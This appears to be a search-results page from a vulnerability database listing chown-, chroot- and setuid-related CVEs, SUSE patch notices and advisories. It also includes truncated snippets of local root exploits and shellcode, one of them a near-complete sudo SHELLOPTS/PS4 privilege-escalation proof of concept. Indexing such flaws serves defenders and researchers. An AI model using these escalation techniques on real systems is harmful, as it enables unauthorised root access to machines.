SuSE 11.3 Security Update : MySQL (SAT Patch Number 8217)

This version upgrade of mysql to 5.5.32 fixes multiple security issues : CVE-2013-1861 / CVE-2013-3783 / CVE-2013-3793 / CVE-2013-3794 / CVE-2013-3795 / CVE-2013-3796 / CVE-2013-3798 / CVE-2013-3801 / CVE-2013-3802 / CVE-2013-3804 / CVE-2013-3805 / CVE-2013-3806 / CVE-2013-3807 / CVE-2013-3808 /...

Setuid Nmap Exploit

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...

TPSparkyRoot

A bug in chmod, mkdir and chown mean that they fail when the last element of their target path is a symlink...

FreeBSD - mbufs() sendfile Cache Poisoning Privilege Escalation

FreeBSD - mbufs sendfile Cache Poisoning Privilege Escalation / freebsd x86/x64 sendfile cache local root xpl v2 by Kingcope 2010 -- should h4x any freebsd 8. and 7. prior to 12Jul2010 tampers /bin/sh to contain a shellcode which does ' chmod a+s /tmp/sh chown root /tmp/sh execve /tmp/sh2 ' how t...

chown root:root /bin/sh x86 linux shellcode 48 bytes

48 bytes chown root:root /bin/sh x86 linux shellcode. Shellcode exploit for linux platform / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 //...

linux/x86 chown root:root /bin/sh shellcode 48 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 chown root:root /bin/sh shellcode 48 bytes ==================================================== / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' ...

Code injection

Unspecified vulnerability in the ZFS filesystem in Sun Solaris 10, and OpenSolaris snv100 through snv117, allows local users to bypass intended limitations of the filechownself privilege via certain uses of the chown system call...

CVE-2009-3706

CVE-2009-3706 affects the ZFS filesystem in Sun Solaris 10 and OpenSolaris snv_100–snv_117. A local attacker can bypass the file_chown_self privilege via certain uses of the chown system call, effectively bypassing intended limitations. The description does not specify concrete affected component...

Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit

No description provided by source. / $Id: raptorchown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ raptorchown.c - syschown missing DAC controls on Linux Copyright c 2004 Marco Ivaldi [email protected] Unknown vulnerability in Linux kernel 2.x may allow local users to modify the group ID of file...

Design/Logic Flaw

The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories...

CVE-2008-0732

CVE-2008-0732 concerns the init script used by Apache Geronimo on SUSE Linux. The issue arises when the script follows symlinks during a chown operation, which could allow a local attacker to obtain access to unspecified files or directories. The available connected documents confirm the vulnerab...

SuSE 10 Security Update : Geronimo (ZYPP Patch Number 4967)

A chown in the geronimo init script could change ownership of directories it did not own, due to following symlinks. The default setup would corrupt /var/tmp on start. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The text description of this plugin is C Novell, Inc...

XFS rc script race conditions

Insecure usage of chown for temporary file allows to change ownersip of arbitrary file...

iDefense Security Advisory 07.12.07: Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability

Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability iDefense Security Advisory 07.12.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 12, 2007 I. BACKGROUND XFS is the X Font Server, and is used to render fonts for the X Window System. "init.d" refers to the...

McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation

!/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Following symlinks is bad mmmmmmmmmmkay! $dest = "/var/cron/tabs/root"; $tgts"0" = "Virex 7.7.dmg:"/Library/Application Support/Virex/VShieldExclude.txt" "; unless $target = @ARGV print "\n\nUsage: $0...

GLIBC (via /bin/su) Local Root Exploit

No description provided by source. / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to rwxrwxr...

Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)

/ $Id: raptorprctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ raptorprctl.c - Linux 2.6.x suiddumpable vulnerability Copyright c 2006 Marco Ivaldi The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of...

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

linux/x86 chroot & standart 66 bytes

No description provided by source. Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru ---------------------------------------------------------------------------------------------- / Mkdir and Chroot are written in C: / includestdio.h includeunistd.h includesys/types.h...

cdrdao (Mandrake 10.2) - Local Privilege Escalation

cdrdao Mandrake 10.2 - Local Privilege Escalation !/bin/sh cdrdao local root exploit newbug at chroot.org IRC: irc.chroot.org chroot May 2005 echo "cdrdao private exploit" echo "This exploit only for Mandrake series" echo "newbug at chroot.org" echo "May 2005" echo "checking if cdrdao is setuid...